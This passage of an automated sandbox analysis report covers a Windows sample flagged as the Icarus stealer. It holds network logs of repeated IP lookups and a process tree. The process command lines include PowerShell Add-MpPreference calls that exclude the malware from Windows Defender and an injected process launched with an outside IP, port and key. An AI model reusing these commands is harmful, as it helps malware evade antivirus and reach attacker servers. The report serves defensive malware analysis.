                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  17192.168.2.75045834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:26.319240093 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:26.773137093 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:25 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  18192.168.2.75046034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:29.884742975 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:30.381728888 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:29 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  19192.168.2.75046234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:32.517427921 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:33.169759035 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:32 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:47:33.203136921 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:32 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  20192.168.2.75046434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:35.160059929 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:35.640785933 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:35 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  21192.168.2.75046634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:37.806063890 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:38.294878960 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:37 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  22192.168.2.75046834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:40.452059031 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:40.928097010 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:40 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  23192.168.2.75047034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:43.088505030 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:43.570760965 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:43 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  24192.168.2.75047234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:45.728125095 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:46.202620983 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:45 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  25192.168.2.75047434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:48.449616909 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:47:48.926489115 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:48 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  26192.168.2.75047634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:51.091321945 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:51.576253891 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:50 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  27192.168.2.75047834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:53.745146036 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:54.219775915 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:53 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  28192.168.2.75048034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:56.388875961 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:47:57.013525009 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:56 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  29192.168.2.75048234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:47:59.062292099 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:00.299155951 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:48:00.299578905 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33
                                  Oct 5, 2024 16:48:00.299741983 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:47:59 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  30192.168.2.75048434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:01.714131117 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:02.192806005 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:02 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  31192.168.2.75048634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:04.337232113 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:04.810293913 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:04 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  32192.168.2.75048834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:06.978383064 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:48:07.471251011 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:07 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  33192.168.2.75049034.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:09.596534014 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:48:10.092355967 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:09 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  34192.168.2.75049234.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:12.167608976 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:48:12.669271946 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:12 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  35192.168.2.75049434.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:14.744007111 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:15.223841906 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:14 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  36192.168.2.75049634.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:17.259351015 CEST61OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Connection: Keep-Alive
                                  Oct 5, 2024 16:48:17.731580973 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:16 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                  37192.168.2.75049834.117.59.81807640C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:19.748536110 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io


                                  Session IDSource IPSource PortDestination IPDestination Port
                                  38192.168.2.75050034.117.59.8180
                                  TimestampBytes transferredDirectionData
                                  Oct 5, 2024 16:48:22.398751974 CEST37OUTGET /ip HTTP/1.1
                                  Host: ipinfo.io
                                  Oct 5, 2024 16:48:22.872123003 CEST240INHTTP/1.1 200 OK
                                  date: Sat, 05 Oct 2024 14:48:22 GMT
                                  content-type: text/plain; charset=utf-8
                                  Content-Length: 11
                                  access-control-allow-origin: *
                                  via: 1.1 google
                                  strict-transport-security: max-age=2592000; includeSubDomains
                                  Data Raw: 38 2e 34 36 2e 31 32 33 2e 33 33
                                  Data Ascii: 8.46.123.33


                                  Statistics

                                  CPU Usage

                                  Click to jump to process

                                  Memory Usage

                                  Click to jump to process

                                  High Level Behavior Distribution

                                  Click to dive into process behavior distribution

                                  Behavior

                                  Click to jump to process

                                  System Behavior

                                  General

                                  Target ID:0
                                  Start time:10:46:14
                                  Start date:05/10/2024
                                  Path:C:\Users\user\Desktop\licarisan_api.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Users\user\Desktop\licarisan_api.exe"
                                  Imagebase:0x400000
                                  File size:4'038'008 bytes
                                  MD5 hash:65A683124FC4CA1839E95322370E2B0D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:low
                                  Has exited:true

                                  General

                                  Target ID:10
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                                  Imagebase:0xb50000
                                  File size:2'141'552 bytes
                                  MD5 hash:EB80BB1CA9B9C7F516FF69AFCFD75B7D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Icarus, Description: Yara detected Icarus stealer, Source: 0000000A.00000002.1448247892.0000000008445000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:true

                                  General

                                  Target ID:11
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:"C:\Windows\explorer.exe"
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:12
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe" ICARUS_Client 193.142.146.64 8880 vUiuCXqqM
                                  Imagebase:0x760000
                                  File size:46'832 bytes
                                  MD5 hash:70D838A7DC5B359C3F938A71FAD77DB0
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Yara matches:
                                  • Rule: JoeSecurity_Icarus, Description: Yara detected Icarus stealer, Source: 0000000C.00000002.2503619664.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                  Reputation:moderate
                                  Has exited:false

                                  General

                                  Target ID:13
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe /NoUACCheck
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:14
                                  Start time:10:46:33
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:false

                                  General

                                  Target ID:15
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\explorer.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\explorer.exe /NoUACCheck
                                  Imagebase:0x7ff70ffd0000
                                  File size:5'141'208 bytes
                                  MD5 hash:662F4F92FDE3557E86D110526BB578D5
                                  Has elevated privileges:false
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:17
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe & exit
                                  Imagebase:0x410000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:18
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:19
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\cmd.exe
                                  Wow64 process (32bit):true
                                  Commandline:"C:\Windows\System32\cmd.exe" /k start /b powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe & exit
                                  Imagebase:0x410000
                                  File size:236'544 bytes
                                  MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:20
                                  Start time:10:46:34
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\conhost.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                  Imagebase:0x7ff75da10000
                                  File size:862'208 bytes
                                  MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:21
                                  Start time:10:46:35
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                  Imagebase:0xf30000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:22
                                  Start time:10:46:35
                                  Start date:05/10/2024
                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                  Wow64 process (32bit):true
                                  Commandline:powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath cvtres.exe
                                  Imagebase:0xf30000
                                  File size:433'152 bytes
                                  MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                  Has elevated privileges:true
                                  Has administrator privileges:true
                                  Programmed in:C, C++ or other language
                                  Reputation:high
                                  Has exited:true

                                  General

                                  Target ID:23
                                  Start time:11:47:32
                                  Start date:05/10/2024
                                  Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                  Wow64 process (32bit):false
                                  Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                  Imagebase:0x7ff7fb730000
                                  File size:496'640 bytes
                                  MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                  Has elevated privileges:true
                                  Has administrator privileges:false
                                  Programmed in:C, C++ or other language
                                  Has exited:false

                                  Disassembly

                                  Reset < >

                                    Execution Graph

                                    Execution Coverage:13.2%
                                    Dynamic/Decrypted Code Coverage:96.6%
                                    Signature Coverage:16.4%
                                    Total number of Nodes:1423
                                    Total number of Limit Nodes:179
                                    execution_graph 27774 436142 27775 43616d VirtualProtect 27774->27775 27777 4361d8 27775->27777 27778 43622b 27777->27778 27783 436262 27777->27783 29711 436825 13 API calls 27778->29711 27784 436758 27783->27784 27973 7b22de 27783->27973 27988 802722 27783->27988 27992 7aa6d8 27783->27992 28017 80f521 27783->28017 28023 7ac5db 27783->28023 28027 7ab1da 27783->28027 28043 7fa3e0 27783->28043 28047 7ac4e0 27783->28047 28051 7a59e0 27783->28051 28055 7abde3 27783->28055 28065 7fa0e7 27783->28065 28069 7a5ae2 27783->28069 28073 7a74ed 27783->28073 28095 7a56ed 27783->28095 28099 7ac2e9 27783->28099 28103 7abde8 27783->28103 28113 7c89ec 27783->28113 28117 7a56f7 27783->28117 28121 7bd0f7 27783->28121 28125 7eeef7 27783->28125 28156 7abcfd 27783->28156 28168 7abeff 27783->28168 28178 7ac1fb 27783->28178 28182 7ab5fa 27783->28182 28192 7abd04 27783->28192 28204 7ac307 27783->28204 28208 7c8200 27783->28208 28216 7aa901 27783->28216 28241 7c8004 27783->28241 28246 7ac60d 27783->28246 28250 7ab20c 27783->28250 28266 7bd109 27783->28266 28270 7ac008 27783->28270 28280 7a5908 27783->28280 28284 7ab715 27783->28284 28294 7c8c12 27783->28294 28298 7a5b14 27783->28298 28302 7ac117 27783->28302 28307 7c8a11 27783->28307 28311 7fa013 27783->28311 28315 7bd010 27783->28315 28320 7b2413 27783->28320 28337 7ac312 27783->28337 28341 7bd11c 27783->28341 28345 7fa119 27783->28345 28349 80f0e2 27783->28349 28355 7b231a 27783->28355 28368 7a6c25 27783->28368 28390 7a5124 27783->28390 28395 7a55dc 27783->28395 28405 7bd022 27783->28405 28410 7ab7d2 27783->28410 28420 7a742c 27783->28420 28442 7a532c 27783->28442 28452 7ab82f 27783->28452 28462 7c8029 27783->28462 28467 7ac429 27783->28467 28471 7ac528 27783->28471 28475 7ac12a 27783->28475 28479 7ac02a 27783->28479 28489 7b2935 27783->28489 28493 7c8232 27783->28493 28501 7b21d6 27783->28501 28510 7aadc2 27783->28510 28526 7ab231 27783->28526 28542 7b2832 27783->28542 28551 7ac632 27783->28551 28555 7ef736 27783->28555 28584 7a5b39 27783->28584 28588 7fa13e 27783->28588 28592 80f2be 27783->28592 28600 7ac544 27783->28600 28604 7f1746 27783->28604 28622 7aae42 27783->28622 28638 7c8b44 27783->28638 28642 7ab84c 27783->28642 28652 7c894a 27783->28652 28656 7ac14f 27783->28656 28660 7ac149 27783->28660 28664 7a7749 27783->28664 28686 7ab54b 27783->28686 28697 7c8553 27783->28697 28703 7a5955 27783->28703 28707 7a5354 27783->28707 28717 7b2756 27783->28717 28729 7a6c56 27783->28729 28751 7c8257 27783->28751 28759 7a5253 27783->28759 28763 7ab65d 27783->28763 28773 80f6a6 27783->28773 28776 7ac25e 27783->28776 28780 7a565e 27783->28780 28784 7f225c 27783->28784 28788 7f1f5f 27783->28788 28794 7ac565 27783->28794 28798 7ab865 27783->28798 28808 7b2767 27783->28808 28819 7a7066 27783->28819 28840 7abd61 27783->28840 28852 7c8067 27783->28852 28856 7ab462 27783->28856 28872 7aa96f 27783->28872 28890 7c8468 27783->28890 28898 7b2268 27783->28898 28911 7ab568 27783->28911 28921 7ac86b 27783->28921 28925 7ef36f 27783->28925 28951 7c8a6d 27783->28951 28955 7c896d 27783->28955 28959 7ab86a 27783->28959 28969 7c836c 27783->28969 28977 7a5d6a 27783->28977 28981 7ce472 27783->28981 28985 7bd176 27783->28985 28989 7ac171 27783->28989 28993 